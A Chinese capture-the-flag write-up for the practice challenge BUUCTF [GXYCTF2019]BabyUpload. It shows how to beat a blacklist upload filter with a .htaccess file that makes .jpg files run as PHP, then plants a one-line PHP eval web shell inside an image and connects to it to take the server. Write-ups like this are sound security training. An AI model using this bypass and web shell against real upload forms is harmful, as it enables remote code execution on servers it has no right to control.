BUUCTF [GXYCTF2019]BabyUpload

Posted 王小帥

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF [GXYCTF2019]BabyUpload相关的知识,希望对你有一定的参考价值。

文件上传题型。

 

直接上传一句话木马

可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。

key.htaccess文件内容如下:

AddType application/x-httpd-php .jpg

 抓包修改文件名上传成功。

接着上传图片马,发现;

 

猜测过滤<?;修改一句话如下:

<script language = 'php'>eval($_REQUEST[a]); </script>

构造图片马上传成功如下:

蚂蚁连接,得到flag

OK! 

 

 

 

以上是关于BUUCTF [GXYCTF2019]BabyUpload的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF[GXYCTF2019]BabySQli

BUUCTF [GXYCTF2019]BabyUpload

BUUCTF[GXYCTF2019]PingPingPing

BUUCTF-[GXYCTF2019]Ping Ping Ping(命令执行)

buuctf 两道GXYCTF逆向

BUUCTF-web